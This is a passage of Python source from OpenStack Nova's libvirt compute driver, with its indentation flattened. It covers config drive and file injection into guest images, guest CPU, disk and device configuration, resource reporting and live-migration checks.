filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = basepath(fname='disk.config')
LOG.info(_('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
                except exception.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Creating config drive failed '
'with error: %s'),
e, instance=instance)
# File injection
elif CONF.libvirt_inject_partition != -2:
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt_inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt_type == 'lxc':
target_partition = None
if CONF.libvirt_inject_key and instance['key_data']:
key = str(instance['key_data'])
else:
key = None
net = netutils.get_injected_network_template(network_info)
metadata = instance.get('metadata')
if not CONF.libvirt_inject_password:
admin_pass = None
if any((key, net, metadata, admin_pass, files)):
# If we're not using config_drive, inject into root fs
injection_path = image('disk').path
img_id = instance['image_ref']
for inj in ('key', 'net', 'metadata', 'admin_pass', 'files'):
if locals()[inj]:
LOG.info(_('Injecting %(inj)s into image '
'%(img_id)s'), locals(), instance=instance)
try:
disk.inject_data(injection_path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Error injecting data into image '
'%(img_id)s (%(e)s)') % locals(),
instance=instance)
if CONF.libvirt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
return self._caps
def get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self.get_host_capabilities()
return caps.host.uuid
def get_host_cpu_for_guest(self):
"""Returns an instance of config.LibvirtConfigGuestCPU
representing the host's CPU model & topology with
policy for configuring a guest to match"""
caps = self.get_host_capabilities()
hostcpu = caps.host.cpu
guestcpu = vconfig.LibvirtConfigGuestCPU()
guestcpu.model = hostcpu.model
guestcpu.vendor = hostcpu.vendor
guestcpu.arch = hostcpu.arch
guestcpu.match = "exact"
for hostfeat in hostcpu.features:
guestfeat = vconfig.LibvirtConfigGuestCPUFeature(hostfeat.name)
guestfeat.policy = "require"
guestcpu.features.append(guestfeat)
return guestcpu
def get_guest_cpu_config(self):
mode = CONF.libvirt_cpu_mode
model = CONF.libvirt_cpu_model
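        # When no CPU mode is configured, KVM and QEMU guests default to
        # "host-model"; every other libvirt type gets no explicit CPU
        # configuration.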
if mode is None:
if CONF.libvirt_type == "kvm" or CONF.libvirt_type == "qemu":
mode = "host-model"
else:
mode = "none"
if mode == "none":
return None
if CONF.libvirt_type != "kvm" and CONF.libvirt_type != "qemu":
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug(_("CPU mode '%(mode)s' model '%(model)s' was chosen")
% {'mode': mode, 'model': (model or "")})
# TODO(berrange): in the future, when MIN_LIBVIRT_VERSION is
# updated to be at least this new, we can kill off the elif
# blocks here
if self.has_min_version(MIN_LIBVIRT_HOST_CPU_VERSION):
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
elif mode == "custom":
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.model = model
elif mode == "host-model":
cpu = self.get_host_cpu_for_guest()
elif mode == "host-passthrough":
msg = _("Passthrough of the host CPU was requested but "
"this libvirt version does not support this feature")
raise exception.NovaException(msg)
return cpu
def get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'])
def get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
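        # LXC guests get their root filesystem as a host directory mount
        # ('rootfs' under the instance path); all other virt types get disk
        # devices built from the disk mapping plus any mapped volumes.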
if CONF.libvirt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self.get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self.get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_ephemeral_device':
'/dev/' + disklocal.target_dev})
for eph in driver.block_device_info_get_ephemerals(
block_device_info):
diskeph = self.get_guest_disk_config(
instance,
blockinfo.get_eph_disk(eph),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self.get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_swap_device': '/dev/' + diskswap.target_dev})
for vol in block_device_mapping:
connection_info = vol['connection_info']
info = disk_mapping[vol['mount_device']]
cfg = self.volume_driver_method('connect_volume',
connection_info,
info)
devices.append(cfg)
if 'disk.config' in disk_mapping:
diskconfig = self.get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
'raw')
devices.append(diskconfig)
for d in devices:
self.set_cache_mode(d)
return devices
def get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self.get_host_uuid()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
guest.memory = inst_type['memory_mb'] * 1024
guest.vcpus = inst_type['vcpus']
quota_items = ['cpu_shares', 'cpu_period', 'cpu_quota']
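        # Copy any CPU quota tuning values (cpu_shares/cpu_period/cpu_quota)
        # from the instance type's extra_specs straight onto the guest
        # config.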
for key, value in inst_type['extra_specs'].iteritems():
if key in quota_items:
setattr(guest, key, value)
guest.cpu = self.get_guest_cpu_config()
if 'root' in disk_mapping and disk_mapping['root']['dev'] is not None:
root_device_name = "/dev/" + disk_mapping['root']['dev']
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'root_device_name': root_device_name})
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.xen_hvmloader_path
if CONF.libvirt_type in ("kvm", "qemu"):
caps = self.get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self.get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
guest.os_init_path = "/sbin/init"
guest.os_cmdline = "console=ttyS0"
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.XEN:
guest.os_root = root_device_name
else:
guest.os_type = vm_mode.HVM
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s console=ttyS0" %
root_device_name)
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s console=ttyS0" %
root_device_name)
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
else:
guest.os_boot_dev = "hd"
if CONF.libvirt_type != "lxc" and CONF.libvirt_type != "uml":
guest.acpi = True
guest.apic = True
clk = vconfig.LibvirtConfigGuestClock()
clk.offset = "utc"
guest.set_clock(clk)
if CONF.libvirt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
for cfg in self.get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
inst_type):
guest.add_device(cfg)
for (network, mapping) in network_info:
cfg = self.vif_driver.get_config(instance,
network, mapping,
image_meta)
guest.add_device(cfg)
if CONF.libvirt_type == "qemu" or CONF.libvirt_type == "kvm":
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
consolepty.type = "pty"
guest.add_device(consolepty)
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
if CONF.vnc_enabled and CONF.libvirt_type not in ('lxc', 'uml'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
if CONF.spice.enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
return guest
def to_xml(self, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
LOG.debug(_("Start to_xml instance=%(instance)s "
"network_info=%(network_info)s "
"disk_info=%(disk_info)s "
"image_meta=%(image_meta)s rescue=%(rescue)s"
"block_device_info=%(block_device_info)s") %
locals())
conf = self.get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug(_('End to_xml instance=%(instance)s xml=%(xml)s') % locals())
return xml
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = _("Error from libvirt while looking up %(instance_name)s: "
"[Error Code %(error_code)s] %(ex)s") % locals()
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
(state, max_mem, mem, num_cpu, cpu_time) = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[state],
'max_mem': max_mem,
'mem': mem,
'num_cpu': num_cpu,
'cpu_time': cpu_time,
'id': virt_dom.ID()}
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
inst_path = None
if instance:
inst_path = libvirt_utils.get_instance_path(instance)
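        # For LXC guests the root disk image is mounted into a 'rootfs'
        # directory under the instance path before the domain is started.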
if CONF.libvirt_type == 'lxc':
if not inst_path:
inst_path = None
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
if xml:
domain = self._conn.defineXML(xml)
domain.createWithFlags(launch_flags)
self._enable_hairpin(domain.XMLDesc(0))
# NOTE(uni): Now the container is running with its own private mount
# namespace and so there is no need to keep the container rootfs
# mounted in the host namespace
if CONF.libvirt_type == 'lxc':
state = self.get_info(instance)['state']
container_dir = os.path.join(inst_path, 'rootfs')
if state == power_state.RUNNING:
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
return domain
def _create_domain_and_network(self, xml, instance, network_info,
block_device_info=None):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance, network_info)
domain = self._create_domain(xml, instance=instance)
self.firewall_driver.apply_instance_filter(instance, network_info)
return domain
def get_all_block_devices(self):
"""
Return all block devices in use on this node.
"""
devices = []
for dom_id in self.list_instance_ids():
try:
domain = self._conn.lookupByID(dom_id)
doc = etree.fromstring(domain.XMLDesc(0))
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def get_disks(self, instance_name):
"""
Note that this function takes an instance name.
Returns a list of all block devices for this domain.
"""
domain = self._lookup_by_name(instance_name)
xml = domain.XMLDesc(0)
try:
doc = etree.fromstring(xml)
except Exception:
return []
return filter(bool,
[target.get("dev")
for target in doc.findall('devices/disk/target')])
def get_interfaces(self, xml):
"""
Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def get_vcpu_total(self):
"""Get vcpu number of physical computer.
:returns: the number of cpu core.
"""
try:
return self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt_images_type == 'lvm':
info = libvirt_utils.get_volume_group_info(
CONF.libvirt_images_volume_group)
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / (1024 ** 3)
return info
def get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu that currently used.
"""
total = 0
if CONF.libvirt_type == 'lxc':
return total + 1
dom_ids = self.list_instance_ids()
for dom_id in dom_ids:
try:
dom = self._conn.lookupByID(dom_id)
vcpus = dom.vcpus()
if vcpus is None:
LOG.debug(_("couldn't obtain the vpu count from domain id:"
" %s") % dom_id)
else:
total += len(vcpus[1])
except libvirt.libvirtError as err:
if err.get_error_code() == libvirt.VIR_ERR_NO_DOMAIN:
LOG.debug(_("List of domains returned by libVirt: %s")
% dom_ids)
LOG.warn(_("libVirt can't find a domain with id: %s")
% dom_id)
continue
raise
            # NOTE(gtt116): yield so other greenthreads get a chance to run.
greenthread.sleep(0)
return total
def get_memory_mb_used(self):
"""Get the free memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
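        # Parse /proc/meminfo into a flat token list; the values of interest
        # sit one token after their 'MemFree:'/'Buffers:'/'Cached:' labels
        # and are reported in kB.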
m = open('/proc/meminfo').read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt_type == 'xen':
used = 0
for domain_id in self.list_instance_ids():
# skip dom0
dom_mem = int(self._conn.lookupByID(domain_id).info()[2])
if domain_id != 0:
used += dom_mem
else:
                    # the memory reported by dom0 is greater than what
                    # it is actually using
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / 1024
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail / 1024
def get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
        # Trying to be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
return self._conn.getHostname()
def get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self.get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self.get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
        # so we could just return the raw capabilities XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
        # the libvirt driver's format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
LOG.debug(_("Trying to get stats for the volume %s"),
bdm['volume_id'])
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
rd_req, rd_bytes, wr_req, wr_bytes, flush_ops = vol_stats
vol_usage.append(dict(volume=bdm['volume_id'],
instance=instance,
rd_req=rd_req,
rd_bytes=rd_bytes,
wr_req=wr_req,
wr_bytes=wr_bytes,
flush_operations=flush_ops))
return vol_usage
def block_stats(self, instance_name, disk):
"""
Note that this function takes an instance name.
"""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_("Getting block stats failed, device might have "
"been detached. Code=%(errcode)s Error=%(e)s")
% locals())
except exception.InstanceNotFound:
LOG.info(_("Could not find domain in libvirt for instance %s. "
"Cannot get block stats for device") % instance_name)
def interface_stats(self, instance_name, interface):
"""
Note that this function takes an instance name.
"""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(interface)
def get_console_pool_info(self, console_type):
#TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource info.
This method is called as a periodic task and is used only
in live migration currently.
:param nodename: ignored in this driver
:returns: dictionary containing resource info
"""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = self.get_disk_over_committed_size_total()
# Disk available least size
available_least = disk_free_gb * (1024 ** 3) - disk_over_committed
return (available_least / (1024 ** 3))
disk_info_dict = self.get_local_gb_info()
dic = {'vcpus': self.get_vcpu_total(),
'memory_mb': self.get_memory_mb_total(),
'local_gb': disk_info_dict['total'],
'vcpus_used': self.get_vcpu_used(),
'memory_mb_used': self.get_memory_mb_used(),
'local_gb_used': disk_info_dict['used'],
'hypervisor_type': self.get_hypervisor_type(),
'hypervisor_version': self.get_hypervisor_version(),
'hypervisor_hostname': self.get_hypervisor_hostname(),
'cpu_info': self.get_cpu_info(),
'disk_available_least': _get_disk_available_least()}
return dic
def check_can_live_migrate_destination(self, ctxt, instance_ref,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param ctxt: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * 1024) - CONF.reserved_host_disk_mb
# Compare CPU
src = instance_ref['host']
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, ctxt,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param ctxt: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, ctxt, instance_ref,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
        :param ctxt: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
source = CONF.host
filename = dest_check_data["filename"]
block_migration = dest_check_data["block_migration"]
is_volume_backed = dest_check_data.get('is_volume_backed', False)
shared = self._check_shared_storage_test_file(filename)
if block_migration:
if shared:
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(ctxt, instance_ref,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not shared and not is_volume_backed:
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
dest_check_data.update({"is_shared_storage": shared})
return dest_check_data
def _assert_dest_node_has_enough_disk(self, context, instance_ref,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
        # Libvirt supports the qcow2 disk format, which is usually
        # compressed on compute nodes.
        # The real (compressed) disk image may grow up to the "virtual disk
        # size" that is specified as the maximum disk size.
        # (See qemu-img info path-to-disk)
        # The scheduler considers the destination host to have enough disk
        # space if:
        #   real disk size < available disk size, when disk_over_commit is
        #   True; otherwise, virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * (1024 ** 2)
ret = self.get_instance_disk_info(instance_ref['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
instance_uuid = instance_ref['uuid']
reason = _("Unable to migrate %(instance_uuid)s: "
"Disk of instance is too large(available"
" on destination host:%(available)s "
"< need:%(necessary)s)")
raise exception.MigrationError(reason=reason % locals())
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openReadonly().getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string that shows cpu feature(see get_cpu_info())
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_('Instance launched has CPU info:\n%s') % cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
        # If an unknown character exists in the xml, libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
        except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = e.message
LOG.error(m % locals())
if ret <= 0:
LOG.error(m % locals())
raise exception.InvalidCPUInfo(reason=m % locals())
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.") % tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
Cannot confirm tmpfile return False."""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance_ref, network_info,
time_module=None):
"""Ensure that an instance's filtering rules are enabled.
